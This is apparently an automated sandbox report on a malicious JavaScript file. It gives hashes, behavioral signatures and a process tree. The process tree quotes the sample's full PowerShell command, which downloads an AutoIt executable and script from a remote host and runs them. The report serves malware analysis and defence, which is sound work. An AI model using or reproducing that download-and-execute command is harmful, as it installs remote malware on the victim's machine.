Analysis
-
max time kernel
122s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
07-11-2023 16:24
Static task
static1
Behavioral task
behavioral1
Sample
27c9f60aaba81.js
Resource
win7-20231025-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
27c9f60aaba81.js
Resource
win10v2004-20231023-en
10 signatures
150 seconds
General
-
Target
27c9f60aaba81.js
-
Size
252KB
-
MD5
5780dea262044531b19f3194408aad91
-
SHA1
a2579952eedec5ec649f589c1e797c91a05eaf93
-
SHA256
eccf555cc4f3293e850fc35377a06d69f04b81192f3f27b645bc4cfb23fc085d
-
SHA512
e45f5351921016ff87e6d81cc1eaade7c88324f847ec37dd60d08bc4830ebe6fb6b00f9623d3438d03c48236f091fff19f239face730ddfa2c9ea6640adc55c3
-
SSDEEP
6144:Ye7hgXeerjqlI2Iro+/e7hgXeerjqlI2Iro+8:YIhgSlI234IhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2044 powershell.exe 2044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2044 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2396 wrote to memory of 2044 2396 wscript.exe 27 PID 2396 wrote to memory of 2044 2396 wscript.exe 27 PID 2396 wrote to memory of 2044 2396 wscript.exe 27
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\27c9f60aaba81.js1⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351/msiqgmovrcg' -OutFile 'qgmovrcg.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'qgmovrcg.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-